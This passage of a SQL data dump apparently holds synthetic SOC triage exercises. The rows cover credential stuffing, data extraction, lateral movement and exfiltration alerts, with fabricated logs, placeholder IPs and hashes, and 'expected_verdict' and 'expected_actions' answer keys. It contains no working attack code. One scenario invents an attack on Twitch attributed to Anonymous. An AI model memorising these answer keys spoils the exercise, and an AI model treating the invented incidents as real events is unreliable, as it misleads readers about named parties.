Doe\\\\\\\",\\\\\\\"email\\\\\\\":\\\\\\\"john.doe@example.com\\\\\\\"}]}\\\",\\\"response_code\\\":500,\\\"user_agent_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"session_id\\\":\\\"abc123sessiontoken\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.741Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.45\\\",\\\"api_endpoint\\\":\\\"/api/v1/contact-import\\\",\\\"http_method\\\":\\\"POST\\\",\\\"request_headers\\\":{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"Content-Type\\\":\\\"application/json\\\"},\\\"request_body\\\":\\\"{\\\\\\\"contacts\\\\\\\":[{\\\\\\\"name\\\\\\\":\\\\\\\"John Doe\\\\\\\",\\\\\\\"email\\\\\\\":\\\\\\\"john.doe@example.com\\\\\\\"}]}\\\",\\\"response_code\\\":500,\\\"user_agent_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"session_id\\\":\\\"abc123sessiontoken\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.741Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.45\\\",\\\"api_endpoint\\\":\\\"/api/v1/contact-import\\\",\\\"http_method\\\":\\\"POST\\\",\\\"request_headers\\\":{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"Content-Type\\\":\\\"application/json\\\"},\\\"request_body\\\":\\\"{\\\\\\\"contacts\\\\\\\":[{\\\\\\\"name\\\\\\\":\\\\\\\"John 
Doe\\\\\\\",\\\\\\\"email\\\\\\\":\\\\\\\"john.doe@example.com\\\\\\\"}]}\\\",\\\"response_code\\\":500,\\\"user_agent_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"session_id\\\":\\\"abc123sessiontoken\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.741Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:00Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.45\\\",\\\"api_endpoint\\\":\\\"/api/v1/contact-import\\\",\\\"http_method\\\":\\\"POST\\\",\\\"request_headers\\\":{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"Content-Type\\\":\\\"application/json\\\"},\\\"request_body\\\":\\\"{\\\\\\\"contacts\\\\\\\":[{\\\\\\\"name\\\\\\\":\\\\\\\"John Doe\\\\\\\",\\\\\\\"email\\\\\\\":\\\\\\\"john.doe@example.com\\\\\\\"}]}\\\",\\\"response_code\\\":500,\\\"user_agent_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"jane.smith\\\",\\\"session_id\\\":\\\"abc123sessiontoken\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1045, 'Malicious Script Execution in API Interactions', 'high', 'Web server logs and API request analysis', 'An advanced persistent threat actor has executed a script to automate the extraction of sensitive data, including phone numbers and personal details, from the API. This operation bypasses the usual rate limits and security measures by exploiting vulnerabilities in the web server logic.', 'Execution', 'T1059.007 - Command and Scripting Interpreter: JavaScript', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\",\"request_method\":\"POST\",\"endpoint\":\"/api/v1/data/extract\",\"script_name\":\"extractor.js\",\"execution_hash\":\"e99a18c428cb38d5f260853678922e03\",\"username\":\"attacker_user\",\"response_code\":200,\"data_extracted\":[\"phone_numbers\",\"personal_details\"]}', '2026-01-24 00:10:54', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple previous attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Compromised internal web server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked with known malicious script.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"extractor.js\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual script name found in 
unauthorized API requests.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"attacker_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Username not recognized in typical user access logs.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'advanced', 'TI', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.743Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"request_method\\\":\\\"POST\\\",\\\"endpoint\\\":\\\"/api/v1/data/extract\\\",\\\"script_name\\\":\\\"extractor.js\\\",\\\"execution_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"response_code\\\":200,\\\"data_extracted\\\":[\\\"phone_numbers\\\",\\\"personal_details\\\"]}\"},{\"timestamp\":\"2026-02-01T20:31:22.743Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 
Safari/537.36\\\",\\\"request_method\\\":\\\"POST\\\",\\\"endpoint\\\":\\\"/api/v1/data/extract\\\",\\\"script_name\\\":\\\"extractor.js\\\",\\\"execution_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"response_code\\\":200,\\\"data_extracted\\\":[\\\"phone_numbers\\\",\\\"personal_details\\\"]}\"},{\"timestamp\":\"2026-02-01T20:30:22.743Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"request_method\\\":\\\"POST\\\",\\\"endpoint\\\":\\\"/api/v1/data/extract\\\",\\\"script_name\\\":\\\"extractor.js\\\",\\\"execution_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"response_code\\\":200,\\\"data_extracted\\\":[\\\"phone_numbers\\\",\\\"personal_details\\\"]}\"},{\"timestamp\":\"2026-02-01T20:29:22.743Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 
Safari/537.36\\\",\\\"request_method\\\":\\\"POST\\\",\\\"endpoint\\\":\\\"/api/v1/data/extract\\\",\\\"script_name\\\":\\\"extractor.js\\\",\\\"execution_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"response_code\\\":200,\\\"data_extracted\\\":[\\\"phone_numbers\\\",\\\"personal_details\\\"]}\"},{\"timestamp\":\"2026-02-01T20:28:22.743Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\\\",\\\"request_method\\\":\\\"POST\\\",\\\"endpoint\\\":\\\"/api/v1/data/extract\\\",\\\"script_name\\\":\\\"extractor.js\\\",\\\"execution_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"username\\\":\\\"attacker_user\\\",\\\"response_code\\\":200,\\\"data_extracted\\\":[\\\"phone_numbers\\\",\\\"personal_details\\\"]}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1046, 'Persistence Through Credential Stuffing', 'high', 'Login activity and failed login attempts', 'The attacker uses credential stuffing techniques to maintain persistent access, leveraging previously breached credentials to avoid detection. Multiple login attempts from a known malicious IP address were detected targeting several user accounts within the network.', 'Persistence', 'T1078.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.15\",\"username_attempted\":\"jdoe\",\"internal_ip\":\"192.168.1.100\",\"failed_attempts\":15,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"method\":\"POST\",\"url\":\"/login\",\"response_code\":401,\"detected_by\":\"SIEM System\",\"additional_info\":{\"related_hash\":\"e99a18c428cb38d5f260853678922e03\",\"related_filename\":\"malicious_script.exe\"}}', '2026-01-24 00:10:54', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with credential stuffing attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"internal\",\"details\":\"User account targeted in attack\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as a credential harvesting tool\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection and Response\",\"verdict\":\"malicious\",\"details\":\"Identified as part of a known attack 
toolkit\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.744Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.15\\\",\\\"username_attempted\\\":\\\"jdoe\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"failed_attempts\\\":15,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"/login\\\",\\\"response_code\\\":401,\\\"detected_by\\\":\\\"SIEM System\\\",\\\"additional_info\\\":{\\\"related_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"related_filename\\\":\\\"malicious_script.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:31:22.744Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.15\\\",\\\"username_attempted\\\":\\\"jdoe\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"failed_attempts\\\":15,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"/login\\\",\\\"response_code\\\":401,\\\"detected_by\\\":\\\"SIEM System\\\",\\\"additional_info\\\":{\\\"related_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"related_filename\\\":\\\"malicious_script.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:30:22.744Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected 
[Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.15\\\",\\\"username_attempted\\\":\\\"jdoe\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"failed_attempts\\\":15,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"/login\\\",\\\"response_code\\\":401,\\\"detected_by\\\":\\\"SIEM System\\\",\\\"additional_info\\\":{\\\"related_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"related_filename\\\":\\\"malicious_script.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:29:22.744Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.15\\\",\\\"username_attempted\\\":\\\"jdoe\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"failed_attempts\\\":15,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"/login\\\",\\\"response_code\\\":401,\\\"detected_by\\\":\\\"SIEM System\\\",\\\"additional_info\\\":{\\\"related_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"related_filename\\\":\\\"malicious_script.exe\\\"}}\"},{\"timestamp\":\"2026-02-01T20:28:22.744Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:23:45Z\\\",\\\"event_id\\\":\\\"4625\\\",\\\"source_ip\\\":\\\"203.0.113.15\\\",\\\"username_attempted\\\":\\\"jdoe\\\",\\\"internal_ip\\\":\\\"192.168.1.100\\\",\\\"failed_attempts\\\":15,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; 
x64)\\\",\\\"method\\\":\\\"POST\\\",\\\"url\\\":\\\"/login\\\",\\\"response_code\\\":401,\\\"detected_by\\\":\\\"SIEM System\\\",\\\"additional_info\\\":{\\\"related_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"related_filename\\\":\\\"malicious_script.exe\\\"}}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1047, 'Lateral Movement via Compromised Accounts', 'high', 'User account activity logs', 'An attacker has expanded their access by compromising additional user accounts through social engineering tactics. This allows access to more user data across the platform.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-04T15:30:45Z\",\"event_type\":\"user_login\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.5.23\",\"username\":\"compromised_user\",\"event_description\":\"Successful login with compromised credentials\",\"associated_files\":[{\"filename\":\"payload.exe\",\"hash\":\"5d41402abc4b2a76b9719d911017c592\"}],\"malicious_activity\":true,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-01-24 00:10:54', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal network\",\"verdict\":\"internal\",\"details\":\"Internal corporate IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Security Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Account activity flagged for unusual login pattern\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', 'SIEM', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:22.746Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T15:30:45Z\\\",\\\"event_type\\\":\\\"user_login\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"event_description\\\":\\\"Successful login with compromised credentials\\\",\\\"associated_files\\\":[{\\\"filename\\\":\\\"payload.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}],\\\"malicious_activity\\\":true,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:22.746Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T15:30:45Z\\\",\\\"event_type\\\":\\\"user_login\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"event_description\\\":\\\"Successful login with compromised credentials\\\",\\\"associated_files\\\":[{\\\"filename\\\":\\\"payload.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}],\\\"malicious_activity\\\":true,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:22.746Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T15:30:45Z\\\",\\\"event_type\\\":\\\"user_login\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"event_description\\\":\\\"Successful login with compromised credentials\\\",\\\"associated_files\\\":[{\\\"filename\\\":\\\"payload.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}],\\\"malicious_activity\\\":true,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:22.746Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T15:30:45Z\\\",\\\"event_type\\\":\\\"user_login\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"event_description\\\":\\\"Successful login with compromised credentials\\\",\\\"associated_files\\\":[{\\\"filename\\\":\\\"payload.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}],\\\"malicious_activity\\\":true,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:22.746Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-04T15:30:45Z\\\",\\\"event_type\\\":\\\"user_login\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"10.0.5.23\\\",\\\"username\\\":\\\"compromised_user\\\",\\\"event_description\\\":\\\"Successful login with compromised credentials\\\",\\\"associated_files\\\":[{\\\"filename\\\":\\\"payload.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\"}],\\\"malicious_activity\\\":true,\\\"user_agent\\\":\\\"Mozilla/5.0 (Windows NT 10.0; Win64; 
x64)\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1048, 'Exfiltration of User Data', 'critical', 'Network traffic analysis', 'Large volumes of data are exfiltrated to an external server, completing the breach and compromising the personal information of millions of users.', 'Exfiltration', 'T1048.003', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T08:45:32Z\",\"event_type\":\"network_traffic\",\"source_ip\":\"192.168.1.101\",\"destination_ip\":\"203.0.113.45\",\"protocol\":\"HTTPS\",\"data_volume\":\"5GB\",\"user\":\"jdoe\",\"process_name\":\"data_transfer.exe\",\"sha256_hash\":\"d1c8c9e3f4b8f3a6d7e8a9b0c9e5c4f3e2d1c4b2e3f6d7a8f9b0c1e2d3f4b5c6\",\"file_name\":\"user_data_backup.zip\"}', '2026-01-24 00:10:54', '2026-02-16 17:50:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal source IP involved in data transfer.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known external server associated with data exfiltration.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d1c8c9e3f4b8f3a6d7e8a9b0c9e5c4f3e2d1c4b2e3f6d7a8f9b0c1e2d3f4b5c6\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known data exfiltration malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_user_database\",\"verdict\":\"internal\",\"details\":\"User account potentially compromised during exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1049, 'Unusual Traffic Detected on Twitch Servers', 'high', 'Network Traffic Analysis', 'Anomalous traffic patterns from an external IP address were detected on Twitch servers. Analysis indicates potential exploitation of a server misconfiguration by an entity linked to Anonymous (4chan). This activity suggests an attempt to gain unauthorized access.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:23:45Z\",\"source_ip\":\"198.51.100.23\",\"destination_ip\":\"10.0.0.25\",\"destination_port\":443,\"protocol\":\"TLS\",\"alert_id\":\"A-2023-0001\",\"user_agent\":\"Mozilla/5.0 (compatible; AnonymousBot/1.0; +http://4chan.org)\",\"url\":\"https://twitch.tv/api/login\",\"http_method\":\"POST\",\"response_code\":200,\"malicious_payload\":{\"filename\":\"exploit_script.js\",\"hash\":\"4d186321c1a7f0f354b297e8914ab240\"}}', '2026-01-24 00:33:47', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous Anonymous operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal Twitch server IP.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"exploit_script.js\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"malicious\",\"details\":\"Script used to exploit server misconfiguration.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"4d186321c1a7f0f354b297e8914ab240\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to known exploit 
